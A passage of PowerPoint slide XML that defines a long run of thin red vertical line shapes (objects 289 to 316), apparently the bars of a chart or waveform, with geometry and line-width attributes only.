                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="190961"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="289" name="object 289"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4899961" y="5605549"/>
            <a:ext cx="0" cy="385055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="194310">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="193963"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="290" name="object 290"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4919794" y="5769573"/>
            <a:ext cx="0" cy="217694"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="109855">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="109691"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="291" name="object 291"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4919794" y="5766598"/>
            <a:ext cx="0" cy="223986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="113030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="112694"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="292" name="object 292"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4939628" y="5664058"/>
            <a:ext cx="0" cy="323396"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="163194">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="162937"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="5606">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="293" name="object 293"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4939628" y="5661083"/>
            <a:ext cx="0" cy="329687"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="166369">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="165940"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="8608">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="294" name="object 294"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4959855" y="5652946"/>
            <a:ext cx="0" cy="334721"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="168910">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="168544"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="295" name="object 295"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4959855" y="5649973"/>
            <a:ext cx="0" cy="341012"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="172085">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="171546"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="296" name="object 296"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979689" y="5714039"/>
            <a:ext cx="0" cy="273062"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="137794">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="137715"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="297" name="object 297"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4979689" y="5711064"/>
            <a:ext cx="0" cy="279353"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="140969">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="140718"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="298" name="object 298"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999521" y="5741806"/>
            <a:ext cx="0" cy="245378"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="123825">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="123703"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="299" name="object 299"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4999521" y="5738831"/>
            <a:ext cx="0" cy="251670"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="127000">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="126706"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="300" name="object 300"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5019356" y="5614077"/>
            <a:ext cx="0" cy="373730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="188594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="188159"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="301" name="object 301"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5019356" y="5611102"/>
            <a:ext cx="0" cy="380021"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="191769">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="191162"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="302" name="object 302"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039188" y="5775125"/>
            <a:ext cx="0" cy="212659"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="107314">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="106889"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="303" name="object 303"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5039188" y="5772149"/>
            <a:ext cx="0" cy="218951"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="110489">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="109892"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="304" name="object 304"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5059023" y="5619628"/>
            <a:ext cx="0" cy="367438"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="185419">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="185357"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="305" name="object 305"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5059023" y="5616653"/>
            <a:ext cx="0" cy="373730"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="188594">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="188360"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="306" name="object 306"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078855" y="5764014"/>
            <a:ext cx="0" cy="223986"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="113030">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="112496"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="307" name="object 307"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5078855" y="5761039"/>
            <a:ext cx="0" cy="229019"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="115569">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="115499"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="308" name="object 308"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5098689" y="5647395"/>
            <a:ext cx="0" cy="339754"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="171450">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="171345"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="309" name="object 309"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5098689" y="5644420"/>
            <a:ext cx="0" cy="346046"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="174625">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="174348"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="310" name="object 310"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5118522" y="5797340"/>
            <a:ext cx="0" cy="190011"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="95885">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="95679"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="311" name="object 311"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5118522" y="5794363"/>
            <a:ext cx="0" cy="196302"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="99060">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="98682"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="312" name="object 312"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138356" y="5675162"/>
            <a:ext cx="0" cy="312070"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="157480">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="157334"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="313" name="object 313"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5138356" y="5672187"/>
            <a:ext cx="0" cy="318362"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="160655">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="160336"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="314" name="object 314"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158188" y="5730695"/>
            <a:ext cx="0" cy="256701"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="129539">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="129310"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="6005">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="315" name="object 315"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5158188" y="5727720"/>
            <a:ext cx="0" cy="262995"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path h="132714">
                <a:moveTo>
                  <a:pt x="0" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="0" y="132312"/>
                </a:lnTo>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="9007">
            <a:solidFill>
              <a:srgbClr val="FF0000"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr sz="3567"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="316" name="object 316"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178417" y="5669611"/>
